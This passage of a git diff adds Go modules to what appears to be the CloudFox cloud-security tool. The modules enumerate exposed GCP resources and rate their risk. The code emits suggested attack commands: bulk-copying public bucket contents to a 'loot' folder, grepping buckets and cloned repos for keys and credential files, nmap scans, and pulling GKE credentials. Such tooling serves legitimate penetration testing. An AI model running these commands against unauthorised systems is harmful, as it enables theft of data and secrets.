ResourceType: "function", + Name: fn.Name, + ProjectID: projectID, + Location: location, + PublicEndpoint: url, + Port: "443", + Protocol: "HTTPS", + AccessLevel: accessLevel, + RiskLevel: riskLevel, + RiskReasons: []string{"Cloud Function publicly invokable"}, + ExploitCommands: []string{ + fmt.Sprintf("# Invoke the function:\ncurl -s %s", url), + fmt.Sprintf("# Invoke with auth:\ncurl -s -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s", url), + fmt.Sprintf("# Describe function:\ngcloud functions describe %s --region=%s --project=%s --gen2", fn.Name, location, projectID), + }, + } + + if fn.ServiceConfig != nil { + resource.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + } + + resources = append(resources, resource) + } + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicGKE(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := container.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + isPublic := false + riskReasons := []string{} + + // Check if cluster has public endpoint + if cluster.PrivateClusterConfig == nil || !cluster.PrivateClusterConfig.EnablePrivateEndpoint { + if cluster.Endpoint != "" { + isPublic = true + riskReasons = append(riskReasons, "GKE API endpoint is public") + } + } + + // Check master authorized networks + if cluster.MasterAuthorizedNetworksConfig == nil || !cluster.MasterAuthorizedNetworksConfig.Enabled { + riskReasons = append(riskReasons, "No master authorized networks configured") + } + + if isPublic { + riskLevel := "MEDIUM" + if len(riskReasons) > 1 { + riskLevel = "HIGH" + } + + resource := PublicResource{ + ResourceType: "gke", + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + PublicEndpoint: cluster.Endpoint, + Port: "443", + Protocol: "HTTPS", + AccessLevel: "Public API", + RiskLevel: riskLevel, + RiskReasons: riskReasons, + ExploitCommands: []string{ + fmt.Sprintf("# Get cluster credentials:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), + "# Check permissions:\nkubectl auth can-i --list", + "# List namespaces:\nkubectl get namespaces", + "# List pods:\nkubectl get pods -A", + }, + } + resources = append(resources, resource) + } + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicBuckets(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := storage.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + // Check IAM policy for public access + iamResp, err := service.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + isPublic := false + accessLevel := "Private" + publicRoles := []string{} + + for _, binding := range iamResp.Bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = member + publicRoles = append(publicRoles, binding.Role) + } + } + } + + if isPublic { + riskLevel := "HIGH" + riskReasons := []string{fmt.Sprintf("Bucket accessible by %s", accessLevel)} + for _, role := range publicRoles { + riskReasons = append(riskReasons, fmt.Sprintf("Public role: %s", role)) + if strings.Contains(role, "objectAdmin") || strings.Contains(role, "storage.admin") { + riskLevel = "CRITICAL" + } + } + + resource := PublicResource{ + ResourceType: "bucket", + Name: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + PublicEndpoint: fmt.Sprintf("https://storage.googleapis.com/%s", bucket.Name), + Protocol: "HTTPS", + AccessLevel: accessLevel, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + ExploitCommands: []string{ + fmt.Sprintf("# List bucket contents:\ngsutil ls gs://%s/", bucket.Name), + fmt.Sprintf("# Download all files:\ngsutil -m cp -r gs://%s/ ./loot/", bucket.Name), + fmt.Sprintf("# Check for sensitive files:\ngsutil ls -r gs://%s/ | grep -iE '\\.(pem|key|json|env|tfstate|sql|bak)'", bucket.Name), + }, + } + resources = append(resources, resource) + } + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicLoadBalancers(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + // Get global forwarding rules (external load balancers) + resp, err := service.GlobalForwardingRules.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, rule := range resp.Items { + if rule.IPAddress != "" { + resource := PublicResource{ + ResourceType: "loadbalancer", + Name: rule.Name, + ProjectID: projectID, + Location: "global", + PublicEndpoint: rule.IPAddress, + Port: rule.PortRange, + Protocol: rule.IPProtocol, + AccessLevel: "Public", + RiskLevel: "LOW", + RiskReasons: []string{"External load balancer with public IP"}, + ExploitCommands: []string{ + fmt.Sprintf("# Scan the endpoint:\nnmap -sV %s", rule.IPAddress), + fmt.Sprintf("# Test HTTP:\ncurl -v http://%s/", rule.IPAddress), + fmt.Sprintf("# Test HTTPS:\ncurl -vk https://%s/", rule.IPAddress), + }, + } + resources = append(resources, resource) + } + } + + return resources, nil +} diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go new file mode 100644 index 00000000..f83198fb --- /dev/null +++ b/gcp/services/pubsubService/pubsubService.go @@ -0,0 +1,313 @@ +package pubsubservice + +import ( + "context" + "fmt" + "strings" + + pubsub "google.golang.org/api/pubsub/v1" +) + +type PubSubService struct{} + +func New() *PubSubService { + return &PubSubService{} +} + +// TopicInfo holds Pub/Sub topic details with security-relevant information +type TopicInfo struct { + Name string + ProjectID string + KmsKeyName string // Encryption key if set + MessageRetentionDuration string + SchemaSettings string + Labels map[string]string + + // IAM + PublisherMembers []string + SubscriberMembers []string + IsPublicPublish bool // allUsers/allAuthenticatedUsers can publish + IsPublicSubscribe bool // allUsers/allAuthenticatedUsers can subscribe + + // Subscriptions count + SubscriptionCount int +} + +// SubscriptionInfo holds Pub/Sub subscription details +type SubscriptionInfo struct { + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project + + // Configuration + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string + + // Push configuration + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string + + // Dead letter + DeadLetterTopic string + MaxDeliveryAttempts int64 + + // BigQuery export + BigQueryTable string + + // Cloud Storage export + CloudStorageBucket string + + // IAM + ConsumerMembers []string + IsPublicConsume bool +} + +// Topics retrieves all Pub/Sub topics in a project +func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub service: %v", err) + } + + var topics []TopicInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Topics.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListTopicsResponse) error { + for _, topic := range page.Topics { + info := parseTopicInfo(topic, projectID) + + // Get subscription count + subCount, _ := ps.getTopicSubscriptionCount(service, topic.Name) + info.SubscriptionCount = subCount + + // Try to get IAM policy + iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) + if iamErr == nil && iamPolicy != nil { + info.PublisherMembers, info.SubscriberMembers, + info.IsPublicPublish, info.IsPublicSubscribe = parseTopicBindings(iamPolicy) + } + + topics = append(topics, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list topics: %v", err) + } + + return topics, nil +} + +// Subscriptions retrieves all Pub/Sub subscriptions in a project +func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub service: %v", err) + } + + var subscriptions []SubscriptionInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Subscriptions.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + info := parseSubscriptionInfo(sub, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) + if iamErr == nil && iamPolicy != nil { + info.ConsumerMembers, info.IsPublicConsume = parseSubscriptionBindings(iamPolicy) + } + + subscriptions = append(subscriptions, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list subscriptions: %v", err) + } + + return subscriptions, nil +} + +// parseTopicInfo extracts relevant information from a Pub/Sub topic +func parseTopicInfo(topic *pubsub.Topic, projectID string) TopicInfo { + info := TopicInfo{ + Name: extractName(topic.Name), + ProjectID: projectID, + Labels: topic.Labels, + } + + if topic.KmsKeyName != "" { + info.KmsKeyName = topic.KmsKeyName + } + + if topic.MessageRetentionDuration != "" { + info.MessageRetentionDuration = topic.MessageRetentionDuration + } + + if topic.SchemaSettings != nil { + info.SchemaSettings = fmt.Sprintf("%s (%s)", + extractName(topic.SchemaSettings.Schema), + topic.SchemaSettings.Encoding) + } + + return info +} + +// parseSubscriptionInfo extracts relevant information from a Pub/Sub subscription +func parseSubscriptionInfo(sub *pubsub.Subscription, projectID string) SubscriptionInfo { + info := SubscriptionInfo{ + Name: sub.Name, + ProjectID: projectID, + Topic: extractName(sub.Topic), + AckDeadlineSeconds: sub.AckDeadlineSeconds, + RetainAckedMessages: sub.RetainAckedMessages, + Filter: sub.Filter, + } + + // Extract name from full path + info.Name = extractName(sub.Name) + + // Extract topic project (may be different from subscription project) + if strings.Contains(sub.Topic, "/") { + parts := strings.Split(sub.Topic, "/") + if len(parts) >= 2 { + info.TopicProject = parts[1] + } + } + + // Message retention + if sub.MessageRetentionDuration != "" { + info.MessageRetention = sub.MessageRetentionDuration + } + + // Expiration policy + if sub.ExpirationPolicy != nil && sub.ExpirationPolicy.Ttl != "" { + info.ExpirationPolicy = sub.ExpirationPolicy.Ttl + } + + // Push configuration + if sub.PushConfig != nil { + info.PushEndpoint = sub.PushConfig.PushEndpoint + + if sub.PushConfig.OidcToken != nil { + info.PushServiceAccount = sub.PushConfig.OidcToken.ServiceAccountEmail + info.PushOIDCAudience = sub.PushConfig.OidcToken.Audience + } + } + + // Dead letter policy + if sub.DeadLetterPolicy != nil { + info.DeadLetterTopic = extractName(sub.DeadLetterPolicy.DeadLetterTopic) + info.MaxDeliveryAttempts = sub.DeadLetterPolicy.MaxDeliveryAttempts + } + + // BigQuery config + if sub.BigqueryConfig != nil { + info.BigQueryTable = sub.BigqueryConfig.Table + } + + // Cloud Storage config + if sub.CloudStorageConfig != nil { + info.CloudStorageBucket = sub.CloudStorageConfig.Bucket + } + + return info +} + +// getTopicSubscriptionCount counts subscriptions for a topic +func (ps *PubSubService) getTopicSubscriptionCount(service *pubsub.Service, topicName string) (int, error) { + ctx := context.Background() + + resp, err := service.Projects.Topics.Subscriptions.List(topicName).Context(ctx).Do() + if err != nil { + return 0, err + } + + return len(resp.Subscriptions), nil +} + +// getTopicIAMPolicy retrieves the IAM policy for a topic +func (ps *PubSubService) getTopicIAMPolicy(service *pubsub.Service, topicName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Topics.GetIamPolicy(topicName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getSubscriptionIAMPolicy retrieves the IAM policy for a subscription +func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subscriptionName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Subscriptions.GetIamPolicy(subscriptionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseTopicBindings extracts who can publish/subscribe and checks for public access +func parseTopicBindings(policy *pubsub.Policy) (publishers []string, subscribers []string, publicPublish bool, publicSubscribe bool) { + for _, binding := range policy.Bindings { + switch binding.Role { + case "roles/pubsub.publisher": + publishers = append(publishers, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicPublish = true + } + } + case "roles/pubsub.subscriber": + subscribers = append(subscribers, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicSubscribe = true + } + } + } + } + return +} + +// parseSubscriptionBindings extracts who can consume messages +func parseSubscriptionBindings(policy *pubsub.Policy) (consumers []string, isPublic bool) { + for _, binding := range policy.Bindings { + if binding.Role == "roles/pubsub.subscriber" || + binding.Role == "roles/pubsub.viewer" { + consumers = append(consumers, binding.Members...) + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go new file mode 100644 index 00000000..96eabcc4 --- /dev/null +++ b/gcp/services/schedulerService/schedulerService.go @@ -0,0 +1,164 @@ +package schedulerservice + +import ( + "context" + "fmt" + "strings" + + scheduler "google.golang.org/api/cloudscheduler/v1" +) + +type SchedulerService struct{} + +func New() *SchedulerService { + return &SchedulerService{} +} + +// JobInfo holds Cloud Scheduler job details with security-relevant information +type JobInfo struct { + Name string + ProjectID string + Location string + Description string + State string // ENABLED, PAUSED, DISABLED, UPDATE_FAILED + Schedule string // Cron expression + TimeZone string + + // Target configuration + TargetType string // http, pubsub, appengine + TargetURI string // For HTTP targets + TargetHTTPMethod string // For HTTP targets + TargetTopic string // For Pub/Sub targets + TargetService string // For App Engine targets + TargetVersion string // For App Engine targets + + // Authentication + ServiceAccount string // OIDC or OAuth service account + AuthType string // OIDC, OAuth, or none + + // Retry configuration + RetryCount int64 + MaxRetryDuration string + MaxBackoff string + + // Timing + LastAttemptTime string + ScheduleTime string + Status string // Last attempt status +} + +// Jobs retrieves all Cloud Scheduler jobs in a project +func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := scheduler.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Scheduler service: %v", err) + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, fmt.Errorf("failed to list jobs: %v", err) + } + + return jobs, nil +} + +// parseJobInfo extracts relevant information from a Cloud Scheduler job +func parseJobInfo(job *scheduler.Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Description: job.Description, + State: job.State, + Schedule: job.Schedule, + TimeZone: job.TimeZone, + } + + // Extract location from job name + // Format: projects/{project}/locations/{location}/jobs/{name} + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + // Parse target configuration + if job.HttpTarget != nil { + info.TargetType = "http" + info.TargetURI = job.HttpTarget.Uri + info.TargetHTTPMethod = job.HttpTarget.HttpMethod + + // Check for OIDC token + if job.HttpTarget.OidcToken != nil { + info.AuthType = "OIDC" + info.ServiceAccount = job.HttpTarget.OidcToken.ServiceAccountEmail + } + + // Check for OAuth token + if job.HttpTarget.OauthToken != nil { + info.AuthType = "OAuth" + info.ServiceAccount = job.HttpTarget.OauthToken.ServiceAccountEmail + } + } + + if job.PubsubTarget != nil { + info.TargetType = "pubsub" + info.TargetTopic = extractName(job.PubsubTarget.TopicName) + } + + if job.AppEngineHttpTarget != nil { + info.TargetType = "appengine" + info.TargetURI = job.AppEngineHttpTarget.RelativeUri + info.TargetHTTPMethod = job.AppEngineHttpTarget.HttpMethod + if job.AppEngineHttpTarget.AppEngineRouting != nil { + info.TargetService = job.AppEngineHttpTarget.AppEngineRouting.Service + info.TargetVersion = job.AppEngineHttpTarget.AppEngineRouting.Version + } + } + + // Retry configuration + if job.RetryConfig != nil { + info.RetryCount = job.RetryConfig.RetryCount + info.MaxRetryDuration = job.RetryConfig.MaxRetryDuration + info.MaxBackoff = job.RetryConfig.MaxBackoffDuration + } + + // Timing info + info.LastAttemptTime = job.LastAttemptTime + info.ScheduleTime = job.ScheduleTime + if job.Status != nil { + info.Status = formatJobStatus(job.Status) + } + + return info +} + +// formatJobStatus formats the job status for display +func formatJobStatus(status *scheduler.Status) string { + if status.Code == 0 { + return "OK" + } + return fmt.Sprintf("Error %d: %s", status.Code, status.Message) +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go new file mode 100644 index 00000000..52531c6a --- /dev/null +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -0,0 +1,294 @@ +package serviceagentsservice + +import ( + "context" + "fmt" + "strings" + + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +type ServiceAgentsService struct{} + +func New() *ServiceAgentsService { + return &ServiceAgentsService{} +} + +// ServiceAgentInfo represents a Google-managed service agent +type ServiceAgentInfo struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. + Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// KnownServiceAgents maps service agent patterns to their descriptions +var KnownServiceAgents = map[string]struct { + Service string + Description string +}{ + "@cloudservices.gserviceaccount.com": { + Service: "Google APIs", + Description: "Google APIs Service Agent - manages resources on behalf of Google Cloud services", + }, + "@compute-system.iam.gserviceaccount.com": { + Service: "Compute Engine", + Description: "Compute Engine Service Agent - manages Compute Engine resources", + }, + "@container-engine-robot.iam.gserviceaccount.com": { + Service: "GKE", + Description: "Kubernetes Engine Service Agent - manages GKE clusters", + }, + "@cloudbuild.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Account - runs build jobs", + }, + "@gcp-sa-cloudbuild.iam.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Agent - manages Cloud Build resources", + }, + "@cloudcomposer-accounts.iam.gserviceaccount.com": { + Service: "Composer", + Description: "Cloud Composer Service Agent - manages Airflow environments", + }, + "@dataflow-service-producer-prod.iam.gserviceaccount.com": { + Service: "Dataflow", + Description: "Dataflow Service Agent - manages Dataflow jobs", + }, + "@gcp-sa-dataproc.iam.gserviceaccount.com": { + Service: "Dataproc", + Description: "Dataproc Service Agent - manages Dataproc clusters", + }, + "@gcp-sa-pubsub.iam.gserviceaccount.com": { + Service: "Pub/Sub", + Description: "Pub/Sub Service Agent - manages Pub/Sub resources", + }, + "@serverless-robot-prod.iam.gserviceaccount.com": { + Service: "Cloud Run/Functions", + Description: "Serverless Service Agent - manages serverless resources", + }, + "@gcp-sa-cloudscheduler.iam.gserviceaccount.com": { + Service: "Cloud Scheduler", + Description: "Cloud Scheduler Service Agent", + }, + "@gcp-sa-bigquery.iam.gserviceaccount.com": { + Service: "BigQuery", + Description: "BigQuery Service Agent - manages BigQuery resources", + }, + "@gcp-sa-artifactregistry.iam.gserviceaccount.com": { + Service: "Artifact Registry", + Description: "Artifact Registry Service Agent", + }, + "@gcp-sa-secretmanager.iam.gserviceaccount.com": { + Service: "Secret Manager", + Description: "Secret Manager Service Agent", + }, + "@gcp-sa-firestore.iam.gserviceaccount.com": { + Service: "Firestore", + Description: "Firestore Service Agent", + }, + "@gcp-sa-cloud-sql.iam.gserviceaccount.com": { + Service: "Cloud SQL", + Description: "Cloud SQL Service Agent", + }, + "@gcp-sa-logging.iam.gserviceaccount.com": { + Service: "Cloud Logging", + Description: "Cloud Logging Service Agent", + }, + "@gcp-sa-monitoring.iam.gserviceaccount.com": { + Service: "Cloud Monitoring", + Description: "Cloud Monitoring Service Agent", + }, +} + +// GetServiceAgents retrieves all service agents with IAM bindings +func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgentInfo, error) { + ctx := context.Background() + service, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %v", err) + } + + var agents []ServiceAgentInfo + + // Get IAM policy + policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get IAM policy: %v", err) + } + + // Track which service agents we've seen + seenAgents := make(map[string]*ServiceAgentInfo) + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if !strings.HasPrefix(member, "serviceAccount:") { + continue + } + + email := strings.TrimPrefix(member, "serviceAccount:") + + // Check if it's a service agent + agentType, description := s.identifyServiceAgent(email) + if agentType == "" { + continue // Not a service agent + } + + // Check for cross-project access + isCrossProject := !strings.Contains(email, projectID) + + // Add or update agent + if agent, exists := seenAgents[email]; exists { + agent.Roles = append(agent.Roles, binding.Role) + } else { + agent := &ServiceAgentInfo{ + Email: email, + ProjectID: projectID, + ServiceName: agentType, + AgentType: agentType, + Roles: []string{binding.Role}, + IsCrossProject: isCrossProject, + Description: description, + RiskReasons: []string{}, + } + seenAgents[email] = agent + } + } + } + + // Convert to slice and analyze risk + for _, agent := range seenAgents { + agent.RiskLevel, agent.RiskReasons = s.analyzeAgentRisk(agent) + agents = append(agents, *agent) + } + + return agents, nil +} + +func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { + // Check known patterns + for suffix, info := range KnownServiceAgents { + if strings.HasSuffix(email, suffix) { + return info.Service, info.Description + } + } + + // Check for generic service agent patterns + if strings.Contains(email, "@gcp-sa-") { + // Extract service name from gcp-sa-{service} + parts := strings.Split(email, "@") + if len(parts) == 2 { + saPart := parts[1] + if strings.HasPrefix(saPart, "gcp-sa-") { + serviceName := strings.TrimPrefix(saPart, "gcp-sa-") + serviceName = strings.Split(serviceName, ".")[0] + return serviceName, fmt.Sprintf("%s Service Agent", serviceName) + } + } + } + + // Check for project-specific service agents + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + return "Compute Engine", "Default Compute Engine service account" + } + + if strings.Contains(email, "@appspot.gserviceaccount.com") { + return "App Engine", "App Engine default service account" + } + + return "", "" +} + +func (s *ServiceAgentsService) analyzeAgentRisk(agent *ServiceAgentInfo) (string, []string) { + var reasons []string + score := 0 + + // Cross-project access is notable + if agent.IsCrossProject { + reasons = append(reasons, "Cross-project service agent (from different project)") + score += 1 + } + + // Check for powerful roles + for _, role := range agent.Roles { + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + reasons = append(reasons, fmt.Sprintf("Has admin role: %s", role)) + score += 2 + } + if role == "roles/owner" || role == "roles/editor" { + reasons = append(reasons, fmt.Sprintf("Has privileged role: %s", role)) + score += 2 + } + if strings.Contains(role, "iam.serviceAccountUser") || + strings.Contains(role, "iam.serviceAccountTokenCreator") { + reasons = append(reasons, fmt.Sprintf("Can impersonate service accounts: %s", role)) + score += 2 + } + } + + // Check for many roles + if len(agent.Roles) > 5 { + reasons = append(reasons, fmt.Sprintf("Has many roles (%d)", len(agent.Roles))) + score += 1 + } + + // Service-specific risks + if agent.ServiceName == "Cloud Build" { + reasons = append(reasons, "Cloud Build SA - often has broad permissions for CI/CD") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// GetDefaultServiceAccounts returns the default service accounts for a project +func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { + var defaults []ServiceAgentInfo + + // Google APIs Service Agent + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@cloudservices.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Google APIs", + AgentType: "Google APIs", + Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", + RiskReasons: []string{"Automatically created with broad permissions"}, + RiskLevel: "INFO", + }) + + // Compute Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Compute Engine", + AgentType: "Compute Engine", + Description: "Default Compute Engine service account - used by instances without explicit SA", + RiskReasons: []string{"Default SA often has Editor role - overprivileged"}, + RiskLevel: "MEDIUM", + }) + + // App Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID), + ProjectID: projectID, + ServiceName: "App Engine", + AgentType: "App Engine", + Description: "App Engine default service account", + RiskReasons: []string{"Default SA often has Editor role"}, + RiskLevel: "MEDIUM", + }) + + return defaults +} diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go new file mode 100644 index 00000000..3ad1c7b0 --- /dev/null +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -0,0 +1,141 @@ +package sourcereposservice + +import ( + "context" + "fmt" + "strings" + + sourcerepo "google.golang.org/api/sourcerepo/v1" +) + +type SourceReposService struct{} + +func New() *SourceReposService { + return &SourceReposService{} +} + +// RepoInfo represents a Cloud Source Repository +type RepoInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + CloneCommands []string `json:"cloneCommands"` +} + +// ListRepos retrieves all Cloud Source Repositories in a project +func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { + ctx := context.Background() + service, err := sourcerepo.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Source Repo service: %v", err) + } + + var repos []RepoInfo + + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to list repos: %v", err) + } + + for _, repo := range resp.Repos { + info := s.parseRepo(repo, projectID) + repos = append(repos, info) + } + + return repos, nil +} + +func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { + // Extract repo name from full path + name := repo.Name + if strings.Contains(name, "/") { + parts := strings.Split(name, "/") + name = parts[len(parts)-1] + } + + info := RepoInfo{ + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, + RiskReasons: []string{}, + } + + // Check for mirror configuration + if repo.MirrorConfig != nil { + info.MirrorConfig = true + info.MirrorURL = repo.MirrorConfig.Url + } + + // Count pubsub configs + if repo.PubsubConfigs != nil { + info.PubsubConfigs = len(repo.PubsubConfigs) + } + + // Generate clone commands + info.CloneCommands = s.generateCloneCommands(info, projectID) + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeRepoRisk(info) + + return info +} + +func (s *SourceReposService) generateCloneCommands(repo RepoInfo, projectID string) []string { + var commands []string + + // Standard gcloud clone + commands = append(commands, + fmt.Sprintf("# Clone repository:\ngcloud source repos clone %s --project=%s", repo.Name, projectID)) + + // Git clone with credential helper + commands = append(commands, + fmt.Sprintf("# Or with git directly:\ngit config credential.helper gcloud.sh && git clone %s", repo.URL)) + + // Search for secrets after clone + commands = append(commands, + fmt.Sprintf("# Search for secrets in cloned repo:\ncd %s && grep -rE '(password|secret|api_key|private_key|AWS_|GOOGLE_)' .", repo.Name), + fmt.Sprintf("# Search for credential files:\nfind %s -name '*.pem' -o -name '*.key' -o -name '.env' -o -name 'credentials*'", repo.Name)) + + return commands +} + +func (s *SourceReposService) analyzeRepoRisk(repo RepoInfo) (string, []string) { + var reasons []string + score := 0 + + // Large repos might contain more sensitive data + if repo.Size > 100*1024*1024 { // > 100MB + reasons = append(reasons, "Large repository (>100MB) - may contain significant code/data") + score += 1 + } + + // Mirror repos might sync from external sources + if repo.MirrorConfig { + reasons = append(reasons, fmt.Sprintf("Mirrors external repo: %s", repo.MirrorURL)) + score += 1 + } + + // Has pubsub triggers (may contain deploy configs) + if repo.PubsubConfigs > 0 { + reasons = append(reasons, fmt.Sprintf("Has %d Pub/Sub trigger(s) - may be CI/CD source", repo.PubsubConfigs)) + score += 1 + } + + // All repos are potentially valuable + reasons = append(reasons, "Source code may contain credentials, API keys, or secrets") + + if score >= 2 { + return "HIGH", reasons + } else if score >= 1 { + return "MEDIUM", reasons + } + return "LOW", reasons +} diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go new file mode 100644 index 00000000..4bc6d57d --- /dev/null +++ b/gcp/services/spannerService/spannerService.go @@ -0,0 +1,84 @@ +package spannerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerService { + return &SpannerService{} +} + +type SpannerInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + Databases []string `json:"databases"` +} + +func (s *SpannerService) ListInstances(projectID string) ([]SpannerInstanceInfo, error) { + ctx := context.Background() + service, err := spanner.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Spanner service: %v", err) + } + + var instances []SpannerInstanceInfo + parent := fmt.Sprintf("projects/%s", projectID) + + req := service.Projects.Instances.List(parent) + err = req.Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := SpannerInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + DisplayName: 